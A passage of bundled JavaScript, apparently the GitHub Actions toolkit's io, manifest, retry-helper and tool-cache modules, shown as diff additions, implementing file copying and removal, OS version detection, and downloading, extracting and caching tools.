(function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.findInPath = exports.which = exports.mkdirP = exports.rmRF = exports.mv = exports.cp = void 0; +const assert_1 = __nccwpck_require__(9491); +const path = __importStar(__nccwpck_require__(1017)); +const ioUtil = __importStar(__nccwpck_require__(1962)); +/** + * Copies a file or folder. + * Based off of shelljs - https://github.com/shelljs/shelljs/blob/9237f66c52e5daa40458f94f9565e18e8132f5a6/src/cp.js + * + * @param source source path + * @param dest destination path + * @param options optional. See CopyOptions. + */ +function cp(source, dest, options = {}) { + return __awaiter(this, void 0, void 0, function* () { + const { force, recursive, copySourceDirectory } = readCopyOptions(options); + const destStat = (yield ioUtil.exists(dest)) ? 
yield ioUtil.stat(dest) : null; + // Dest is an existing file, but not forcing + if (destStat && destStat.isFile() && !force) { + return; + } + // If dest is an existing directory, should copy inside. + const newDest = destStat && destStat.isDirectory() && copySourceDirectory + ? path.join(dest, path.basename(source)) + : dest; + if (!(yield ioUtil.exists(source))) { + throw new Error(`no such file or directory: ${source}`); + } + const sourceStat = yield ioUtil.stat(source); + if (sourceStat.isDirectory()) { + if (!recursive) { + throw new Error(`Failed to copy. ${source} is a directory, but tried to copy without recursive flag.`); + } + else { + yield cpDirRecursive(source, newDest, 0, force); + } + } + else { + if (path.relative(source, newDest) === '') { + // a file cannot be copied to itself + throw new Error(`'${newDest}' and '${source}' are the same file`); + } + yield copyFile(source, newDest, force); + } + }); +} +exports.cp = cp; +/** + * Moves a path. + * + * @param source source path + * @param dest destination path + * @param options optional. See MoveOptions. 
+ */ +function mv(source, dest, options = {}) { + return __awaiter(this, void 0, void 0, function* () { + if (yield ioUtil.exists(dest)) { + let destExists = true; + if (yield ioUtil.isDirectory(dest)) { + // If dest is directory copy src into dest + dest = path.join(dest, path.basename(source)); + destExists = yield ioUtil.exists(dest); + } + if (destExists) { + if (options.force == null || options.force) { + yield rmRF(dest); + } + else { + throw new Error('Destination already exists'); + } + } + } + yield mkdirP(path.dirname(dest)); + yield ioUtil.rename(source, dest); + }); +} +exports.mv = mv; +/** + * Remove a path recursively with force + * + * @param inputPath path to remove + */ +function rmRF(inputPath) { + return __awaiter(this, void 0, void 0, function* () { + if (ioUtil.IS_WINDOWS) { + // Check for invalid characters + // https://docs.microsoft.com/en-us/windows/win32/fileio/naming-a-file + if (/[*"<>|]/.test(inputPath)) { + throw new Error('File path must not contain `*`, `"`, `<`, `>` or `|` on Windows'); + } + } + try { + // note if path does not exist, error is silent + yield ioUtil.rm(inputPath, { + force: true, + maxRetries: 3, + recursive: true, + retryDelay: 300 + }); + } + catch (err) { + throw new Error(`File was unable to be removed ${err}`); + } + }); +} +exports.rmRF = rmRF; +/** + * Make a directory. Creates the full path with folders in between + * Will throw if it fails + * + * @param fsPath path to create + * @returns Promise + */ +function mkdirP(fsPath) { + return __awaiter(this, void 0, void 0, function* () { + assert_1.ok(fsPath, 'a path argument must be provided'); + yield ioUtil.mkdir(fsPath, { recursive: true }); + }); +} +exports.mkdirP = mkdirP; +/** + * Returns path of a tool had the tool actually been invoked. Resolves via paths. + * If you check and the tool does not exist, it will throw. 
+ * + * @param tool name of the tool + * @param check whether to check if tool exists + * @returns Promise path to tool + */ +function which(tool, check) { + return __awaiter(this, void 0, void 0, function* () { + if (!tool) { + throw new Error("parameter 'tool' is required"); + } + // recursive when check=true + if (check) { + const result = yield which(tool, false); + if (!result) { + if (ioUtil.IS_WINDOWS) { + throw new Error(`Unable to locate executable file: ${tool}. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also verify the file has a valid extension for an executable file.`); + } + else { + throw new Error(`Unable to locate executable file: ${tool}. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also check the file mode to verify the file is executable.`); + } + } + return result; + } + const matches = yield findInPath(tool); + if (matches && matches.length > 0) { + return matches[0]; + } + return ''; + }); +} +exports.which = which; +/** + * Returns a list of all occurrences of the given tool on the system path. + * + * @returns Promise the paths of the tool + */ +function findInPath(tool) { + return __awaiter(this, void 0, void 0, function* () { + if (!tool) { + throw new Error("parameter 'tool' is required"); + } + // build the list of extensions to try + const extensions = []; + if (ioUtil.IS_WINDOWS && process.env['PATHEXT']) { + for (const extension of process.env['PATHEXT'].split(path.delimiter)) { + if (extension) { + extensions.push(extension); + } + } + } + // if it's rooted, return it if exists. otherwise return empty. 
+ if (ioUtil.isRooted(tool)) { + const filePath = yield ioUtil.tryGetExecutablePath(tool, extensions); + if (filePath) { + return [filePath]; + } + return []; + } + // if any path separators, return empty + if (tool.includes(path.sep)) { + return []; + } + // build the list of directories + // + // Note, technically "where" checks the current directory on Windows. From a toolkit perspective, + // it feels like we should not do this. Checking the current directory seems like more of a use + // case of a shell, and the which() function exposed by the toolkit should strive for consistency + // across platforms. + const directories = []; + if (process.env.PATH) { + for (const p of process.env.PATH.split(path.delimiter)) { + if (p) { + directories.push(p); + } + } + } + // find all matches + const matches = []; + for (const directory of directories) { + const filePath = yield ioUtil.tryGetExecutablePath(path.join(directory, tool), extensions); + if (filePath) { + matches.push(filePath); + } + } + return matches; + }); +} +exports.findInPath = findInPath; +function readCopyOptions(options) { + const force = options.force == null ? true : options.force; + const recursive = Boolean(options.recursive); + const copySourceDirectory = options.copySourceDirectory == null + ? 
true + : Boolean(options.copySourceDirectory); + return { force, recursive, copySourceDirectory }; +} +function cpDirRecursive(sourceDir, destDir, currentDepth, force) { + return __awaiter(this, void 0, void 0, function* () { + // Ensure there is not a run away recursive copy + if (currentDepth >= 255) + return; + currentDepth++; + yield mkdirP(destDir); + const files = yield ioUtil.readdir(sourceDir); + for (const fileName of files) { + const srcFile = `${sourceDir}/${fileName}`; + const destFile = `${destDir}/${fileName}`; + const srcFileStat = yield ioUtil.lstat(srcFile); + if (srcFileStat.isDirectory()) { + // Recurse + yield cpDirRecursive(srcFile, destFile, currentDepth, force); + } + else { + yield copyFile(srcFile, destFile, force); + } + } + // Change the mode for the newly created directory + yield ioUtil.chmod(destDir, (yield ioUtil.stat(sourceDir)).mode); + }); +} +// Buffered file copy +function copyFile(srcFile, destFile, force) { + return __awaiter(this, void 0, void 0, function* () { + if ((yield ioUtil.lstat(srcFile)).isSymbolicLink()) { + // unlink/re-link it + try { + yield ioUtil.lstat(destFile); + yield ioUtil.unlink(destFile); + } + catch (e) { + // Try to override file permission + if (e.code === 'EPERM') { + yield ioUtil.chmod(destFile, '0666'); + yield ioUtil.unlink(destFile); + } + // other errors = it doesn't exist, no work to do + } + // Copy over symlink + const symlinkFull = yield ioUtil.readlink(srcFile); + yield ioUtil.symlink(symlinkFull, destFile, ioUtil.IS_WINDOWS ? 'junction' : null); + } + else if (!(yield ioUtil.exists(destFile)) || force) { + yield ioUtil.copyFile(srcFile, destFile); + } + }); +} +//# sourceMappingURL=io.js.map + +/***/ }), + +/***/ 2473: +/***/ (function(module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? 
(function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports._readLinuxVersionFile = exports._getOsVersion = exports._findMatch = void 0; +const semver = __importStar(__nccwpck_require__(5911)); +const core_1 = __nccwpck_require__(2186); +// needs to be require for core node modules to be mocked +/* eslint @typescript-eslint/no-require-imports: 0 */ +const os = __nccwpck_require__(2037); +const cp = __nccwpck_require__(2081); +const fs = __nccwpck_require__(7147); +function _findMatch(versionSpec, stable, candidates, archFilter) { + return __awaiter(this, void 0, void 0, function* () { + const platFilter = os.platform(); + let result; + let match; + let file; + for (const candidate of candidates) { + const version = candidate.version; + core_1.debug(`check ${version} satisfies ${versionSpec}`); + if (semver.satisfies(version, versionSpec) && + (!stable || candidate.stable === stable)) { + file = candidate.files.find(item => { + core_1.debug(`${item.arch}===${archFilter} && ${item.platform}===${platFilter}`); + let chk = item.arch === archFilter && item.platform === platFilter; + if (chk && item.platform_version) { + const osVersion = module.exports._getOsVersion(); + if (osVersion === item.platform_version) { + chk = true; + } + else { + chk = semver.satisfies(osVersion, item.platform_version); + } + } + return chk; + }); + if (file) { + core_1.debug(`matched ${candidate.version}`); + match = candidate; + break; + } + } + } + if (match && file) { + // clone since we're mutating the file list to be only the file that matches + result = Object.assign({}, match); + result.files = [file]; + } + return result; + }); +} +exports._findMatch = _findMatch; +function _getOsVersion() { + // TODO: add windows and other linux, arm variants + // right now filtering on version is only an ubuntu and macos scenario 
for tools we build for hosted (python) + const plat = os.platform(); + let version = ''; + if (plat === 'darwin') { + version = cp.execSync('sw_vers -productVersion').toString(); + } + else if (plat === 'linux') { + // lsb_release process not in some containers, readfile + // Run cat /etc/lsb-release + // DISTRIB_ID=Ubuntu + // DISTRIB_RELEASE=18.04 + // DISTRIB_CODENAME=bionic + // DISTRIB_DESCRIPTION="Ubuntu 18.04.4 LTS" + const lsbContents = module.exports._readLinuxVersionFile(); + if (lsbContents) { + const lines = lsbContents.split('\n'); + for (const line of lines) { + const parts = line.split('='); + if (parts.length === 2 && + (parts[0].trim() === 'VERSION_ID' || + parts[0].trim() === 'DISTRIB_RELEASE')) { + version = parts[1] + .trim() + .replace(/^"/, '') + .replace(/"$/, ''); + break; + } + } + } + } + return version; +} +exports._getOsVersion = _getOsVersion; +function _readLinuxVersionFile() { + const lsbReleaseFile = '/etc/lsb-release'; + const osReleaseFile = '/etc/os-release'; + let contents = ''; + if (fs.existsSync(lsbReleaseFile)) { + contents = fs.readFileSync(lsbReleaseFile).toString(); + } + else if (fs.existsSync(osReleaseFile)) { + contents = fs.readFileSync(osReleaseFile).toString(); + } + return contents; +} +exports._readLinuxVersionFile = _readLinuxVersionFile; +//# sourceMappingURL=manifest.js.map + +/***/ }), + +/***/ 8279: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
(function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.RetryHelper = void 0; +const core = __importStar(__nccwpck_require__(2186)); +/** + * Internal class for retries + */ +class RetryHelper { + constructor(maxAttempts, minSeconds, maxSeconds) { + if (maxAttempts < 1) { + throw new Error('max attempts should be greater than or equal to 1'); + } + this.maxAttempts = maxAttempts; + this.minSeconds = Math.floor(minSeconds); + this.maxSeconds = Math.floor(maxSeconds); + if (this.minSeconds > this.maxSeconds) { + throw new Error('min seconds should be less than or equal to max seconds'); + } + } + execute(action, isRetryable) { + return __awaiter(this, void 0, void 0, function* () { + let attempt = 1; + while (attempt < this.maxAttempts) { + // Try + try { + return yield action(); + } + catch (err) { + if (isRetryable && !isRetryable(err)) { + throw err; + } + 
core.info(err.message); + } + // Sleep + const seconds = this.getSleepAmount(); + core.info(`Waiting ${seconds} seconds before trying again`); + yield this.sleep(seconds); + attempt++; + } + // Last attempt + return yield action(); + }); + } + getSleepAmount() { + return (Math.floor(Math.random() * (this.maxSeconds - this.minSeconds + 1)) + + this.minSeconds); + } + sleep(seconds) { + return __awaiter(this, void 0, void 0, function* () { + return new Promise(resolve => setTimeout(resolve, seconds * 1000)); + }); + } +} +exports.RetryHelper = RetryHelper; +//# sourceMappingURL=retry-helper.js.map + +/***/ }), + +/***/ 7784: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? 
value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +var __importDefault = (this && this.__importDefault) || function (mod) { + return (mod && mod.__esModule) ? mod : { "default": mod }; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.evaluateVersions = exports.isExplicitVersion = exports.findFromManifest = exports.getManifestFromRepo = exports.findAllVersions = exports.find = exports.cacheFile = exports.cacheDir = exports.extractZip = exports.extractXar = exports.extractTar = exports.extract7z = exports.downloadTool = exports.HTTPError = void 0; +const core = __importStar(__nccwpck_require__(2186)); +const io = __importStar(__nccwpck_require__(7436)); +const fs = __importStar(__nccwpck_require__(7147)); +const mm = __importStar(__nccwpck_require__(2473)); +const os = __importStar(__nccwpck_require__(2037)); +const path = __importStar(__nccwpck_require__(1017)); +const httpm = __importStar(__nccwpck_require__(6255)); +const semver = __importStar(__nccwpck_require__(5911)); +const stream = __importStar(__nccwpck_require__(2781)); +const util = __importStar(__nccwpck_require__(3837)); +const assert_1 = __nccwpck_require__(9491); +const v4_1 = __importDefault(__nccwpck_require__(7468)); +const exec_1 = __nccwpck_require__(1514); +const retry_helper_1 = __nccwpck_require__(8279); +class HTTPError extends Error { + constructor(httpStatusCode) { + super(`Unexpected HTTP response: ${httpStatusCode}`); + this.httpStatusCode = httpStatusCode; + Object.setPrototypeOf(this, new.target.prototype); + 
} +} +exports.HTTPError = HTTPError; +const IS_WINDOWS = process.platform === 'win32'; +const IS_MAC = process.platform === 'darwin'; +const userAgent = 'actions/tool-cache'; +/** + * Download a tool from an url and stream it into a file + * + * @param url url of tool to download + * @param dest path to download tool + * @param auth authorization header + * @param headers other headers + * @returns path to downloaded tool + */ +function downloadTool(url, dest, auth, headers) { + return __awaiter(this, void 0, void 0, function* () { + dest = dest || path.join(_getTempDirectory(), v4_1.default()); + yield io.mkdirP(path.dirname(dest)); + core.debug(`Downloading ${url}`); + core.debug(`Destination ${dest}`); + const maxAttempts = 3; + const minSeconds = _getGlobal('TEST_DOWNLOAD_TOOL_RETRY_MIN_SECONDS', 10); + const maxSeconds = _getGlobal('TEST_DOWNLOAD_TOOL_RETRY_MAX_SECONDS', 20); + const retryHelper = new retry_helper_1.RetryHelper(maxAttempts, minSeconds, maxSeconds); + return yield retryHelper.execute(() => __awaiter(this, void 0, void 0, function* () { + return yield downloadToolAttempt(url, dest || '', auth, headers); + }), (err) => { + if (err instanceof HTTPError && err.httpStatusCode) { + // Don't retry anything less than 500, except 408 Request Timeout and 429 Too Many Requests + if (err.httpStatusCode < 500 && + err.httpStatusCode !== 408 && + err.httpStatusCode !== 429) { + return false; + } + } + // Otherwise retry + return true; + }); + }); +} +exports.downloadTool = downloadTool; +function downloadToolAttempt(url, dest, auth, headers) { + return __awaiter(this, void 0, void 0, function* () { + if (fs.existsSync(dest)) { + throw new Error(`Destination file path ${dest} already exists`); + } + // Get the response headers + const http = new httpm.HttpClient(userAgent, [], { + allowRetries: false + }); + if (auth) { + core.debug('set auth'); + if (headers === undefined) { + headers = {}; + } + headers.authorization = auth; + } + const response = yield 
http.get(url, headers); + if (response.message.statusCode !== 200) { + const err = new HTTPError(response.message.statusCode); + core.debug(`Failed to download from "${url}". Code(${response.message.statusCode}) Message(${response.message.statusMessage})`); + throw err; + } + // Download the response body + const pipeline = util.promisify(stream.pipeline); + const responseMessageFactory = _getGlobal('TEST_DOWNLOAD_TOOL_RESPONSE_MESSAGE_FACTORY', () => response.message); + const readStream = responseMessageFactory(); + let succeeded = false; + try { + yield pipeline(readStream, fs.createWriteStream(dest)); + core.debug('download complete'); + succeeded = true; + return dest; + } + finally { + // Error, delete dest before retry + if (!succeeded) { + core.debug('download failed'); + try { + yield io.rmRF(dest); + } + catch (err) { + core.debug(`Failed to delete '${dest}'. ${err.message}`); + } + } + } + }); +} +/** + * Extract a .7z file + * + * @param file path to the .7z file + * @param dest destination directory. Optional. + * @param _7zPath path to 7zr.exe. Optional, for long path support. Most .7z archives do not have this + * problem. If your .7z archive contains very long paths, you can pass the path to 7zr.exe which will + * gracefully handle long paths. By default 7zdec.exe is used because it is a very small program and is + * bundled with the tool lib. However it does not support long paths. 7zr.exe is the reduced command line + * interface, it is smaller than the full command line interface, and it does support long paths. At the + * time of this writing, it is freely available from the LZMA SDK that is available on the 7zip website. + * Be sure to check the current license agreement. If 7zr.exe is bundled with your action, then the path + * to 7zr.exe can be pass to this function. 
+ * @returns path to the destination directory + */ +function extract7z(file, dest, _7zPath) { + return __awaiter(this, void 0, void 0, function* () { + assert_1.ok(IS_WINDOWS, 'extract7z() not supported on current OS'); + assert_1.ok(file, 'parameter "file" is required'); + dest = yield _createExtractFolder(dest); + const originalCwd = process.cwd(); + process.chdir(dest); + if (_7zPath) { + try { + const logLevel = core.isDebug() ? '-bb1' : '-bb0'; + const args = [ + 'x', + logLevel, + '-bd', + '-sccUTF-8', + file + ]; + const options = { + silent: true + }; + yield exec_1.exec(`"${_7zPath}"`, args, options); + } + finally { + process.chdir(originalCwd); + } + } + else { + const escapedScript = path + .join(__dirname, '..', 'scripts', 'Invoke-7zdec.ps1') + .replace(/'/g, "''") + .replace(/"|\n|\r/g, ''); // double-up single quotes, remove double quotes and newlines + const escapedFile = file.replace(/'/g, "''").replace(/"|\n|\r/g, ''); + const escapedTarget = dest.replace(/'/g, "''").replace(/"|\n|\r/g, ''); + const command = `& '${escapedScript}' -Source '${escapedFile}' -Target '${escapedTarget}'`; + const args = [ + '-NoLogo', + '-Sta', + '-NoProfile', + '-NonInteractive', + '-ExecutionPolicy', + 'Unrestricted', + '-Command', + command + ]; + const options = { + silent: true + }; + try { + const powershellPath = yield io.which('powershell', true); + yield exec_1.exec(`"${powershellPath}"`, args, options); + } + finally { + process.chdir(originalCwd); + } + } + return dest; + }); +} +exports.extract7z = extract7z; +/** + * Extract a compressed tar archive + * + * @param file path to the tar + * @param dest destination directory. Optional. + * @param flags flags for the tar command to use for extraction. Defaults to 'xz' (extracting gzipped tars). Optional. 
+ * @returns path to the destination directory + */ +function extractTar(file, dest, flags = 'xz') { + return __awaiter(this, void 0, void 0, function* () { + if (!file) { + throw new Error("parameter 'file' is required"); + } + // Create dest + dest = yield _createExtractFolder(dest); + // Determine whether GNU tar + core.debug('Checking tar --version'); + let versionOutput = ''; + yield exec_1.exec('tar --version', [], { + ignoreReturnCode: true, + silent: true, + listeners: { + stdout: (data) => (versionOutput += data.toString()), + stderr: (data) => (versionOutput += data.toString()) + } + }); + core.debug(versionOutput.trim()); + const isGnuTar = versionOutput.toUpperCase().includes('GNU TAR'); + // Initialize args + let args; + if (flags instanceof Array) { + args = flags; + } + else { + args = [flags]; + } + if (core.isDebug() && !flags.includes('v')) { + args.push('-v'); + } + let destArg = dest; + let fileArg = file; + if (IS_WINDOWS && isGnuTar) { + args.push('--force-local'); + destArg = dest.replace(/\\/g, '/'); + // Technically only the dest needs to have `/` but for aesthetic consistency + // convert slashes in the file arg too. + fileArg = file.replace(/\\/g, '/'); + } + if (isGnuTar) { + // Suppress warnings when using GNU tar to extract archives created by BSD tar + args.push('--warning=no-unknown-keyword'); + args.push('--overwrite'); + } + args.push('-C', destArg, '-f', fileArg); + yield exec_1.exec(`tar`, args); + return dest; + }); +} +exports.extractTar = extractTar; +/** + * Extract a xar compatible archive + * + * @param file path to the archive + * @param dest destination directory. Optional. + * @param flags flags for the xar. Optional. 
+ * @returns path to the destination directory + */ +function extractXar(file, dest, flags = []) { + return __awaiter(this, void 0, void 0, function* () { + assert_1.ok(IS_MAC, 'extractXar() not supported on current OS'); + assert_1.ok(file, 'parameter "file" is required'); + dest = yield _createExtractFolder(dest); + let args; + if (flags instanceof Array) { + args = flags; + } + else { + args = [flags]; + } + args.push('-x', '-C', dest, '-f', file); + if (core.isDebug()) { + args.push('-v'); + } + const xarPath = yield io.which('xar', true); + yield exec_1.exec(`"${xarPath}"`, _unique(args)); + return dest; + }); +} +exports.extractXar = extractXar; +/** + * Extract a zip + * + * @param file path to the zip + * @param dest destination directory. Optional. + * @returns path to the destination directory + */ +function extractZip(file, dest) { + return __awaiter(this, void 0, void 0, function* () { + if (!file) { + throw new Error("parameter 'file' is required"); + } + dest = yield _createExtractFolder(dest); + if (IS_WINDOWS) { + yield extractZipWin(file, dest); + } + else { + yield extractZipNix(file, dest); + } + return dest; + }); +} +exports.extractZip = extractZip; +function extractZipWin(file, dest) { + return __awaiter(this, void 0, void 0, function* () { + // build the powershell command + const escapedFile = file.replace(/'/g, "''").replace(/"|\n|\r/g, ''); // double-up single quotes, remove double quotes and newlines + const escapedDest = dest.replace(/'/g, "''").replace(/"|\n|\r/g, ''); + const pwshPath = yield io.which('pwsh', false); + //To match the file overwrite behavior on nix systems, we use the overwrite = true flag for ExtractToDirectory + //and the -Force flag for Expand-Archive as a fallback + if (pwshPath) { + //attempt to use pwsh with ExtractToDirectory, if this fails attempt Expand-Archive + const pwshCommand = [ + `$ErrorActionPreference = 'Stop' ;`, + `try { Add-Type -AssemblyName System.IO.Compression.ZipFile } catch { } ;`, + `try { 
[System.IO.Compression.ZipFile]::ExtractToDirectory('${escapedFile}', '${escapedDest}', $true) }`, + `catch { if (($_.Exception.GetType().FullName -eq 'System.Management.Automation.MethodException') -or ($_.Exception.GetType().FullName -eq 'System.Management.Automation.RuntimeException') ){ Expand-Archive -LiteralPath '${escapedFile}' -DestinationPath '${escapedDest}' -Force } else { throw $_ } } ;` + ].join(' '); + const args = [ + '-NoLogo', + '-NoProfile', + '-NonInteractive', + '-ExecutionPolicy', + 'Unrestricted', + '-Command', + pwshCommand + ]; + core.debug(`Using pwsh at path: ${pwshPath}`); + yield exec_1.exec(`"${pwshPath}"`, args); + } + else { + const powershellCommand = [ + `$ErrorActionPreference = 'Stop' ;`, + `try { Add-Type -AssemblyName System.IO.Compression.FileSystem } catch { } ;`, + `if ((Get-Command -Name Expand-Archive -Module Microsoft.PowerShell.Archive -ErrorAction Ignore)) { Expand-Archive -LiteralPath '${escapedFile}' -DestinationPath '${escapedDest}' -Force }`, + `else {[System.IO.Compression.ZipFile]::ExtractToDirectory('${escapedFile}', '${escapedDest}', $true) }` + ].join(' '); + const args = [ + '-NoLogo', + '-Sta', + '-NoProfile', + '-NonInteractive', + '-ExecutionPolicy', + 'Unrestricted', + '-Command', + powershellCommand + ]; + const powershellPath = yield io.which('powershell', true); + core.debug(`Using powershell at path: ${powershellPath}`); + yield exec_1.exec(`"${powershellPath}"`, args); + } + }); +} +function extractZipNix(file, dest) { + return __awaiter(this, void 0, void 0, function* () { + const unzipPath = yield io.which('unzip', true); + const args = [file]; + if (!core.isDebug()) { + args.unshift('-q'); + } + args.unshift('-o'); //overwrite with -o, otherwise a prompt is shown which freezes the run + yield exec_1.exec(`"${unzipPath}"`, args, { cwd: dest }); + }); +} +/** + * Caches a directory and installs it into the tool cacheDir + * + * @param sourceDir the directory to cache into tools + * @param tool tool 
name + * @param version version of the tool. semver format + * @param arch architecture of the tool. Optional. Defaults to machine architecture + */ +function cacheDir(sourceDir, tool, version, arch) { + return __awaiter(this, void 0, void 0, function* () { + version = semver.clean(version) || version; + arch = arch || os.arch(); + core.debug(`Caching tool ${tool} ${version} ${arch}`); + core.debug(`source dir: ${sourceDir}`); + if (!fs.statSync(sourceDir).isDirectory()) { + throw new Error('sourceDir is not a directory'); + } + // Create the tool dir + const destPath = yield _createToolPath(tool, version, arch); + // copy each child item. do not move. move can fail on Windows + // due to anti-virus software having an open handle on a file. + for (const itemName of fs.readdirSync(sourceDir)) { + const s = path.join(sourceDir, itemName); + yield io.cp(s, destPath, { recursive: true }); + } + // write .complete + _completeToolPath(tool, version, arch); + return destPath; + }); +} +exports.cacheDir = cacheDir; +/** + * Caches a downloaded file (GUID) and installs it + * into the tool cache with a given targetName + * + * @param sourceFile the file to cache into tools. Typically a result of downloadTool which is a guid. + * @param targetFile the name of the file name in the tools directory + * @param tool tool name + * @param version version of the tool. semver format + * @param arch architecture of the tool. Optional. Defaults to machine architecture + */ +function cacheFile(sourceFile, targetFile, tool, version, arch) { + return __awaiter(this, void 0, void 0, function* () { + version = semver.clean(version) || version; + arch = arch || os.arch(); + core.debug(`Caching tool ${tool} ${version} ${arch}`); + core.debug(`source file: ${sourceFile}`); + if (!fs.statSync(sourceFile).isFile()) { + throw new Error('sourceFile is not a file'); + } + // create the tool dir + const destFolder = yield _createToolPath(tool, version, arch); + // copy instead of move. 
move can fail on Windows due to + // anti-virus software having an open handle on a file. + const destPath = path.join(destFolder, targetFile); + core.debug(`destination file ${destPath}`); + yield io.cp(sourceFile, destPath); + // write .complete + _completeToolPath(tool, version, arch); + return destFolder; + }); +} +exports.cacheFile = cacheFile; +/** + * Finds the path to a tool version in the local installed tool cache + * + * @param toolName name of the tool + * @param versionSpec version of the tool + * @param arch optional arch. defaults to arch of computer + */ +function find(toolName, versionSpec, arch) { + if (!toolName) { + throw new Error('toolName parameter is required'); + } + if (!versionSpec) { + throw new Error('versionSpec parameter is required'); + } + arch = arch || os.arch(); + // attempt to resolve an explicit version + if (!isExplicitVersion(versionSpec)) { + const localVersions = findAllVersions(toolName, arch); + const match = evaluateVersions(localVersions, versionSpec); + versionSpec = match; + } + // check for the explicit version in the cache + let toolPath = ''; + if (versionSpec) { + versionSpec = semver.clean(versionSpec) || ''; + const cachePath = path.join(_getCacheDirectory(), toolName, versionSpec, arch); + core.debug(`checking cache: ${cachePath}`); + if (fs.existsSync(cachePath) && fs.existsSync(`${cachePath}.complete`)) { + core.debug(`Found tool in cache ${toolName} ${versionSpec} ${arch}`); + toolPath = cachePath; + } + else { + core.debug('not found'); + } + } + return toolPath; +} +exports.find = find; +/** + * Finds the paths to all versions of a tool that are installed in the local tool cache + * + * @param toolName name of the tool + * @param arch optional arch. 
